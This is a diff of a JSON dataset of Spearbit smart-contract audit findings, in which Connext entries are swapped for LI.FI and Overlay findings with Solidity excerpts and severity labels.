AmarokFacet { function startBridgeTokensViaAmarok(...) ... { ... if (_bridgeData.assetId == address(0)) ... } function swapAndStartBridgeTokensViaAmarok(... ) ... { ... if (_bridgeData.assetId == address(0)) ... } } contract AnyswapFacet { function swapAndStartBridgeTokensViaAnyswap(...) ... { ... if (_anyswapData.token == address(0)) revert TokenAddressIsZero(); ... } } contract HyphenFacet { function _startBridge(...) ... { ... if (_hyphenData.token != address(0)) ... } } contract StargateFacet { function _startBridge(...) ... { ... if (token == address(0)) ... } } contract LibAsset { function transferFromERC20(...) ... { ...
if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); ... } function transferAsset(...) ... { ... (assetId == NATIVE_ASSETID) ... } }", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "Redundant fee on transfer logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function repayAavePortalFor() has logic for fee on transfer tokens. However, handleIncomin- gAsset() doesnt allow fee on transfer tokens. So this extra code shouldnt be necessary in repayAavePortal- For(). function repayAavePortalFor(...) ... { ... (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // If this was a fee on transfer token, reduce the total if (amount < total) { uint256 missing; unchecked { missing = total - amount; } if (missing < _feeAmount) { // Debit fee amount unchecked { _feeAmount -= missing; } } else { // Debit backing amount unchecked { missing -= _feeAmount; } _feeAmount = 0; _backingAmount -= missing; } } ... } library AssetLogic { function handleIncomingAsset(...) ... { ... // Transfer asset to contract trueAmount = transferAssetToContract(_assetId, _assetAmount); .... } function transferAssetToContract(address _assetId, uint256 _amount) internal returns (uint256) { ... // Validate correct amounts are transferred uint256 starting = IERC20(_assetId).balanceOf(address(this)); SafeERC20.safeTransferFrom(IERC20(_assetId), msg.sender, address(this), _amount); // Ensure this was not a fee-on-transfer token if (IERC20(_assetId).balanceOf(address(this)) - starting != _amount) { revert AssetLogic__transferAssetToContract_feeOnTransferNotSupported(); } ... } } 34", + "title": "Consider using wrapped native token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The code currently supports bridging native tokens. However, this has the following drawbacks: not every bridge supports native tokens; native tokens have an inherent risk of reentrancy; native tokens introduce additional code paths, which is more difficult to maintain and results in a higher risk of bugs. Also, wrapped tokens are more composable. This is also useful for bridges that currently don't support native tokens, like the AxelarFacet, the WormholeFacet, and the StargateFacet.", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "Some gas can be saved in reimburseLiquidityFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Some gas can be saved by assigning tokenExchange before the if statement. This also improves readability. function reimburseLiquidityFees(...) ... { ... if (address(tokenExchanges[_token]) != address(0)) { // could use `tokenExchange` ITokenExchange tokenExchange = tokenExchanges[_token]; // do before the if }", + "title": "Incorrect event emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Li.fi follows a two-step ownership transfer pattern, where the current owner first proposes an address to be the new owner.
Then that address accepts the ownership in a different transaction via confirmOwnershipTransfer(): function confirmOwnershipTransfer() external { if (msg.sender != pendingOwner) revert NotPendingOwner(); owner = pendingOwner; pendingOwner = LibAsset.NULL_ADDRESS; emit OwnershipTransferred(owner, pendingOwner); } At the time of emitting OwnershipTransferred, pendingOwner is always address(0) and owner is the new owner. This event should be used to log the addresses between which the ownership transfer happens.", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "LIQUIDITY_FEE_DENOMINATOR could be a constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The value of LIQUIDITY_FEE_DENOMINATOR seems to be constant. However, it is currently stored in s and requires an SLOAD operation to retrieve it, increasing gas costs. upgrade-initializers/DiamondInit.sol: BridgeFacet.sol: BridgeFacet.sol: PortalFacet.sol: AssetLogic.sol: s.LIQUIDITY_FEE_DENOMINATOR = 10000; toSwap = _getFastTransferAmount(..., s.LIQUIDITY_FEE_DENOMINATOR); s.portalFeeDebt[_transferId] = ... / s.LIQUIDITY_FEE_DENOMINATOR; if (_aavePortalFeeNumerator > s.LIQUIDITY_FEE_DENOMINATOR) ... uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR;", + "title": "If statement does not check mintAmount properly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the zapIn function, mintAmount is checked with the following if statement. However, it directly uses the contract balance instead of taking the difference between mintAmount and preMintBalance. ... ... uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)); if (!success && mintAmount == 0) { revert MintingError(res); } mintAmount = mintAmount - preMintBalance;", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "Access elements from storage array instead of loading them in memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "SwapUtils.removeLiquidityOneToken() function only needs the length and one element of the storage array self.pooledTokens. For this, the function reads the entire array in memory which costs extra gas. IERC20[] memory pooledTokens = self.pooledTokens; ... uint256 numTokens = pooledTokens.length; ... pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); 35
This costs extra gas because of staticcalls made to an external contract.", + "title": "Better variable naming", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "MAX_INT is defined to be the maximum value of the uint256 data type: uint256 private constant MAX_INT = type(uint256).max; This variable name can be interpreted as the maximum value of the int256 data type, which is lower than type(uint256).max.", "labels": [ "Spearbit", - "Connext", - "Severity: Gas Optimization" + "LIFI", + "Severity: Informational" ] }, { - "title": "AAVE portal debt might not be repaid in full if debt is converted to interest paying", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Aave portal mechanism gives routers access to a limited amount of unbacked debt which is to be used when fronting liquidity for cross-chain transfers. The process for receiving unbacked debt is as follows: During message execution, the protocol checks if a single liquidity provider has bid on a liquidity auction which is handled by the relayer network. If the provider has insufficient liquidity, the protocol attempts to utilize AAVE unbacked debt by minting uncol- lateralised aTokens and withdrawing them from the pool. The withdrawn amount is immediately used to pay out the recipient of the bridge transfer. Currently the debt is fixed fee, see arc-whitelist-connext-for-v3-portals, however this might be changed in the future out of band. Incase this would be changed: upon repayment, AAVE will actually expect unbackedDebt + fee + aToken interest. The current implementation will only track unbackedDebt + fee, hence, the protocol will accrue bad debt in the form of interest. Eventually, the extent of this bad debt will reach a point where the unbacked- MintCap has been reached and noone is able to pay off this debt. I consider this to be a long-term issue that could be handled in a future upgrade, however, it is important to highlight and address these issues early.", + "title": "Event is missing indexed fields", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Indexed event fields make the field more quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission, so it's not necessarily best to index the maximum allowed per event (three fields).", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Routers pay the slippage cost for users when using AAVE credit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "When routers do the fast of adopted token and _fastTransferAmount = * _fastTransferAmount /s.LIQUIDITY_FEE_DENOMINATOR _args.amount * s.LIQUIDITY_FEE_NUMERATOR / s.LIQUIDITY_FEE_DENOMINATOR. The routers get reimbursed _args.amount of local tokens afterward. Thus, the routers lose money if the slippage of swapping between local tokens and adopted tokens are larger than the liquidityFee. function _executePortalTransfer( bytes32 _transferId, bytes32 _canonicalId, uint256 _fastTransferAmount, address _router ) internal returns (uint256, address) { // Calculate local to adopted swap output if needed address adopted = s.canonicalToAdopted[_canonicalId]; ,! ,! ,!
IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); // Improvement: Instead of withdrawing to address(this), withdraw directly to the user or executor to save 1 transfer uint256 amountWithdrawn = IAavePool(s.aavePool).withdraw(adopted, _fastTransferAmount, address(this)); if (amountWithdrawn < _fastTransferAmount) revert BridgeFacet__executePortalTransfer_insufficientAmountWithdrawn(); // Store principle debt s.portalDebt[_transferId] = _fastTransferAmount; // Store fee debt s.portalFeeDebt[_transferId] = (s.aavePortalFeeNumerator * _fastTransferAmount) / s.LIQUIDITY_FEE_DENOMINATOR; ,! emit AavePortalMintUnbacked(_transferId, _router, adopted, _fastTransferAmount); return (_fastTransferAmount, adopted); }", + "title": "Remove misleading comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "WithdrawFacet.sol has the following misleading comment, which can be removed. It's unclear why this comment was made. address self = address(this); // workaround for a possible solidity bug", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Optimize max checks in initializeSwap()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function initializeSwap() reverts if a value is >= ...MAX.... Probably should revert when > ...MAX.... function initializeSwap(...) ... { ... // Check _a, _fee, _adminFee, _withdrawFee parameters if (_a >= AmplificationUtils.MAX_A) revert SwapAdminFacet__initializeSwap_aExceedMax(); if (_fee >= SwapUtils.MAX_SWAP_FEE) revert SwapAdminFacet__initializeSwap_feeExceedMax(); if (_adminFee >= SwapUtils.MAX_ADMIN_FEE) revert SwapAdminFacet__initializeSwap_adminFeeExceedMax(); ... }", + "title": "Redundant events/errors/imports on the contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, it has been observed that several events and errors are not used in the contracts. By deleting these redundant events and errors, gas can be saved. FusePoolZap.sol#L28 - CannotDepositNativeToken GenericSwapFacet.sol#L7 - ZeroPostSwapBalance WormholeFacet.sol#L12 - InvalidAmount and InvalidConfig HyphenFacet.sol#L32 - HyphenInitialized HyphenFacet.sol#L9 - InvalidAmount and InvalidConfig HopFacet.sol#L9 - InvalidAmount, InvalidConfig and InvalidBridgeConfigLength HopFacet.sol#L36 - HopInitialized PolygonBridgeFacet.sol#L28 - InvalidConfig Executor.sol#L5 - IAxelarGasService AcrossFacet.sol#L37 - UseWethInstead, InvalidAmount, NativeValueWithERC, InvalidConfig NXTPFacet.sol#L9 - InvalidAmount, NativeValueWithERC, NoSwapDataProvided, InvalidConfig", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "All routers share the same AAVE debt", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The mintUnbacked amount is allocated to the calling contract (eg the Connext Diamond that has the BRIDGE role permission). Thus it is not separated to different routers, if one router does not payback its debt (in time) and has the max debt then this facility cannot be used any more. function _executePortalTransfer( ... ) ... { ... IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); ...
}", + "title": "forceSlow option is disabled on the AmarokFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "On the AmarokFacet contract, forceSlow option is disabled. According to documentation, forceS- low is an option that allows users to take the Nomad slow path (~30 mins) instead of paying routers a 0.05% fee on their transaction. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Careful with fee on transfer tokens on AAVE loans", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The Aave function backUnbacked() does not account for fee on transfer tokens. If these happen to be used then the accounting might not be right. function _backLoan(...) ... { ... // back loan IAavePool(s.aavePool).backUnbacked(_asset, _backing, _fee); ... } library BridgeLogic { function executeBackUnbacked(... ) ... { ... reserve.unbacked -= backingAmount.toUint128(); reserve.updateInterestRates(reserveCache, asset, added, 0); IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added); ... } }", + "title": "Incomplete NatSpec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Some functions are missing @param for some of their parameters. Given that NatSpec is an impor- tant part of code documentation, this affects code comprehension, auditability and usability.", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Let getTokenPrice() also return the source of the price info", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function getTokenPrice() can get its prices information from multiple sources. For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { }", + "title": "Use nonReentrant modifier in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "AxelarFacet, zapIn of the contract FusePoolZap and completeBridgeTokensViaStargate() - swapAndCom- pleteBridgeTokensViaStargate of the StargateFacet dont have a nonReentrant modifier. All other facets that integrate with the external contract do have this modifier. executeCallWithTokenViaAxelar of contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { } function executeCallViaAxelar(...) ... { } } contract FusePoolZap { function zapIn(...) ... { } } There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. The makes the code more difficult to maintain and verify. contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { function sgReceive(...) external nonReentrant { ... 
{ - "title": "Let getTokenPrice() also return the source of the price info", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function getTokenPrice() can get its price information from multiple sources. For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { }", + "title": "Use nonReentrant modifier in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "AxelarFacet, zapIn of the contract FusePoolZap and completeBridgeTokensViaStargate() - swapAndCompleteBridgeTokensViaStargate of the StargateFacet don't have a nonReentrant modifier. All other facets that integrate with external contracts do have this modifier. executeCallWithTokenViaAxelar of contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { } function executeCallViaAxelar(...) ... { } } contract FusePoolZap { function zapIn(...) ... { } } There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. This makes the code more difficult to maintain and verify. contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { function sgReceive(...) external nonReentrant { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, receiver); ... } function completeBridgeTokensViaStargate(...) external { ... } } contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { } }", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Typos in the comments of _swapAsset() and _swapAssetOut()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "There are typos in the comments of _swapAsset() and _swapAssetOut(): * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAsset(... ) ... * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAssetOut(...) ...", + "title": "Typos on the codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Across the codebase, there are typos in the comments. cancelOnwershipTransfer -> cancelOwnershipTransfer. addresss -> address. Conatains -> Contains. Intitiates -> Initiates.", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "Consistently delete array entries in PromiseRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "In function process() of PromiseRouter.sol two different ways are used to clear a value: one with delete and the other with = 0. Although technically the same, it is better to use the same method to maintain consistency. function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // remove message delete messageHashes[transferId]; // remove callback fees callbackFees[transferId] = 0; ... }", + "title": "Store all error messages in GenericErrors.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The file GenericErrors.sol contains several error messages and is used from most other Solidity files. However, several other error messages are defined in the Solidity files themselves. It would be more consistent and easier to maintain to store these in GenericErrors.sol as well. Note: the Periphery contract also contains error messages which are not listed below.
Here are the error messages contained in the Solidity files: Facets/AcrossFacet.sol:37: error UseWethInstead(); Facets/AmarokFacet.sol:31: error InvalidReceiver(); Facets/ArbitrumBridgeFacet.sol:30: error InvalidReceiver(); Facets/GnosisBridgeFacet.sol:31: error InvalidDstChainId(); Facets/GnosisBridgeFacet.sol:32: error InvalidSendingToken(); Facets/OmniBridgeFacet.sol:27: error InvalidReceiver(); Facets/OptimismBridgeFacet.sol:29: error InvalidReceiver(); Facets/OwnershipFacet.sol:20: error NoNullOwner(); Facets/OwnershipFacet.sol:21: error NewOwnerMustNotBeSelf(); Facets/OwnershipFacet.sol:22: error NoPendingOwnershipTransfer(); Facets/OwnershipFacet.sol:23: error NotPendingOwner(); Facets/PolygonBridgeFacet.sol:28: error InvalidConfig(); Facets/PolygonBridgeFacet.sol:29: error InvalidReceiver(); Facets/StargateFacet.sol:39: error InvalidConfig(); Facets/StargateFacet.sol:40: error InvalidStargateRouter(); Facets/StargateFacet.sol:41: error InvalidCaller(); Facets/WithdrawFacet.sol:20: error NotEnoughBalance(uint256 requested, uint256 available); Facets/WithdrawFacet.sol:21: error WithdrawFailed(); Helpers/ReentrancyGuard.sol:20: error ReentrancyError(); Libraries/LibAccess.sol:18: error UnAuthorized(); Libraries/LibSwap.sol:9: error NoSwapFromZeroBalance();", "labels": [ "Spearbit", - "Connext", + "LIFI", "Severity: Informational" ] }, { - "title": "getTokenPrice() will revert if setDirectPrice() is set in the future", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The setDirectPrice() function allows the protocol admin to update the price up to two seconds in the future. This impacts the getTokenPrice() function as the updated value may be slightly incorrect.", + "title": "Use unchecked in TickMath.sol and FullMath.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Uniswap math libraries rely on wrapping behaviour for conducting arithmetic operations. Solidity version 0.8.0 introduced checked arithmetic by default, where operations that cause an overflow would revert. Since the code was adapted from Uniswap and written in Solidity version 0.7.6, these arithmetic operations should be wrapped in an unchecked block.", "labels": [ "Spearbit", - "Connext", - "Severity: Low Risk" + "Overlay", + "Severity: High Risk" ] },
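A minimal sketch of the unchecked pattern recommended above, assuming code that deliberately relies on wrapping arithmetic (the function here is illustrative, not from TickMath.sol or FullMath.sol):

pragma solidity ^0.8.10;

library UncheckedMathExample {
    // Code ported from Solidity <0.8 that depends on wrapping must be placed in
    // an unchecked block; under the default checked arithmetic of 0.8.x it
    // would revert exactly where wrapping was intended.
    function wrappingAdd(uint256 a, uint256 b) internal pure returns (uint256 c) {
        unchecked {
            c = a + b; // wraps modulo 2**256 instead of reverting on overflow
        }
    }
}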
{ - "title": "Roundup in words not optimal", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function words, which is used in the Nomad code base, tries to do a round up. Currently it adds 1 to the len. /** * @notice The number of memory words this memory view occupies, rounded up. * @param memView The view * @return uint256 - The number of memory words */ function words(bytes29 memView) internal pure returns (uint256) { return uint256(len(memView)).add(32) / 32; }", + "title": "Liquidation might fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The liquidate() function checks if a position can be liquidated via liquidatable(), which uses maintenanceMarginFraction as a factor to determine if enough value is left. However, in the rest of the liquidate() function liquidationFeeRate is used to determine the fee paid to the liquidator. It is not necessarily true that enough value is left for the fee, as two different ways are used to calculate this, which means that liquidations might fail. This is classified as high risk because liquidation is an essential functionality of Overlay. contract OverlayV1Market is IOverlayV1Market { function liquidate(address owner, uint256 positionId) external { ... require(pos.liquidatable(..., maintenanceMarginFraction),\"OVLV1:!liquidatable\"); ... uint256 liquidationFee = value.mulDown(liquidationFeeRate); ... ovl.transfer(msg.sender, value - liquidationFee); ovl.transfer(IOverlayV1Factory(factory).feeRecipient(), liquidationFee); } } library Position { function liquidatable(..., uint256 maintenanceMarginFraction) ... { ... uint256 maintenanceMargin = posNotionalInitial.mulUp(maintenanceMarginFraction); can_ = val < maintenanceMargin; } }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: High Risk" ] }, { - "title": "callback could have capped returnData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function execute() caps the result of the call to excessivelySafeCall to a maximum of MAX_COPY bytes, making sure the result is small enough to fit in a message sent back to the originator. However, when the callback is done the originator needs to be aware that the data can be capped, and this fact is not clearly documented. function execute(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); } function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // execute callback ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); // returnData is capped ... }", + "title": "Rounding down of snapAccumulator might influence calculations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function transform() lowers snapAccumulator with the following equation: (snapAccumulator * int256(dt)) / int256(snapWindow). During the time that snapAccumulator * dt is smaller than snapWindow this will be rounded down to 0, which means snapAccumulator will stay at the same value. Luckily, dt will eventually reach the value of snapWindow and by then the value won't be rounded down to 0 any more. Risk lies in calculations diverging from the formulas written in the whitepaper. Note: Given medium risk severity because the probability of this happening is high, while the impact is likely low. function transform(...) ... { ... snapAccumulator -= (snapAccumulator * int256(dt)) / int256(snapWindow); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Medium Risk" ] },
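The rounding-to-zero behaviour described above follows from Solidity's integer division; a small self-contained sketch with illustrative numbers (not Overlay's actual parameters):

pragma solidity ^0.8.10;

contract RoundingExample {
    // With snapAccumulator = 100 and snapWindow = 3600, any dt < 36 gives
    // (100 * dt) / 3600 == 0, so the decay step subtracts nothing at all.
    function decayStep(int256 snapAccumulator, int256 dt, int256 snapWindow) external pure returns (int256) {
        return snapAccumulator - (snapAccumulator * dt) / snapWindow; // integer division truncates toward zero
    }
}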
{ - "title": "Several external functions are not nonReentrant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The following functions don't have nonReentrant, while most other external functions do have such a modifier. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. initiateClaim of RelayerFacet. There are many swaps in the protocol and some of them should be conducted in an aggregator (not yet implemented). A lot of the aggregators use the difference between pre-swap balance and post-swap balance (e.g. Uniswap V3 router, 1inch, etc.). While this isn't exploitable yet, there is a chance that future updates might open up an issue to exploit.", + "title": "Verify pool legitimacy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The constructor in OverlayV1UniswapV3Factory.sol and OverlayV1UniswapV3Feed.sol only does a partial check to see if the pool corresponds to the supplied tokens. This is accomplished by calling the pool's functions, but if the pool were to be malicious, it could return any token. Additionally, checks can be bypassed by supplying the same tokens twice. Because the deployFeed() function is permissionless, it is possible to deploy malicious feeds. Luckily, the deployMarket() function is permissioned and prevents malicious markets from being deployed. contract OverlayV1UniswapV3Factory is IOverlayV1UniswapV3FeedFactory, OverlayV1FeedFactory { constructor(address _ovlWethPool, address _ovl, ...) { ovlWethPool = _ovlWethPool; // no check on validity of _ovlWethPool here ovl = _ovl; } function deployFeed(address marketPool, address marketBaseToken, address marketQuoteToken, ...) external returns (address feed_) { // Permissionless ... // no check on validity of marketPool here } } contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { constructor( address _marketPool, address _ovlWethPool, address _ovl, address _marketBaseToken, address _marketQuoteToken, ... ) ... { ... address _marketToken0 = IUniswapV3Pool(_marketPool).token0(); // relies on a valid _marketPool address _marketToken1 = IUniswapV3Pool(_marketPool).token1(); require(_marketToken0 == WETH || _marketToken1 == WETH, \"OVLV1Feed: marketToken != WETH\"); marketToken0 = _marketToken0; marketToken1 = _marketToken1; require( _marketToken0 == _marketBaseToken || _marketToken1 == _marketBaseToken, \"OVLV1Feed: marketToken != marketBaseToken\" ); require( _marketToken0 == _marketQuoteToken || _marketToken1 == _marketQuoteToken, \"OVLV1Feed: marketToken != marketQuoteToken\" ); marketBaseToken = _marketBaseToken; // what if _marketBaseToken == _marketQuoteToken == WETH ? marketQuoteToken = _marketQuoteToken; marketBaseAmount = _marketBaseAmount; // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); // relies on a valid _ovlWethPool address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); require( _ovlWethToken0 == WETH || _ovlWethToken1 == WETH, \"OVLV1Feed: ovlWethToken != WETH\" ); require( _ovlWethToken0 == _ovl || _ovlWethToken1 == _ovl, // What if _ovl == WETH ?
\"OVLV1Feed: ovlWethToken != OVL\" ); ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; marketPool = _marketPool; ovlWethPool = _ovlWethPool; ovl = _ovl; }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Medium Risk" ] }, { - "title": "NomadFacet.reconcile() has an unused argument canonicalDomain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "NomadFacet.reconcile() has an unused argument canonicalDomain.", + "title": "Liquidatable positions can be unwound by the owner of the position", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The liquidation function can be front-runned since it does not require any deposits. In particular, the liquidation function can be front-runned by the owner of the position by calling unwind. This effectively means that users can prevent themselves from getting liquidated by watching the mempool and frontrunning calls to their liquidation position by calling unwind. Although this behaviour is similar to liquidations in lending protocols where a borrower can front-run a liquidation by repaying the borrow, the lack of collateral requirements for both unwind and liquidation makes this case special. Note: In practice, transactions for liquidations do not end up in the public mempool and are often sent via private relays such as flashbots. Therefore, a scenario where the user finds out about a liquidatable position by the public mempool is likely not common. However, a similar argument still applies. Note: Overlay also allows the owner of the position to be the liquidator, unlike other protocols like compound. The difference in price computation for the liquidation and unwind mechanism may make it better for users to liquidate themselves rather than unwinding their position. However, a check similar to compound is not effective at preventing this issue since users can always liquidate themselves from another address.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "SwapUtils._calculateSwap() returns two values with different precision", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "SwapUtils._calculateSwap() returns (uint256 dy, uint256 dyFee). dy is the amount of tokens a user will get from a swap and dyFee is the associated fee. To account for the different token decimal precision between the two tokens being swapped, a multipliers mapping is used to bring the precision to the same value. To return the final values, dy is changed back to the original token precision but dyFee is not. This is an internal function and the callers adjust the fee precision back to normal, therefore severity is informa- tional. But without documentation it is easy to miss.", + "title": "Adding constructor params causes creation code to change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Using constructor parameters in create2 makes the construction code different for every case. This makes address calculation more complex as you first have to calculate the construction code, hash it and then do address calculation. Whats worse is that Etherscan does not properly support auto-verification of contracts deployed via create2 with different creation code. 
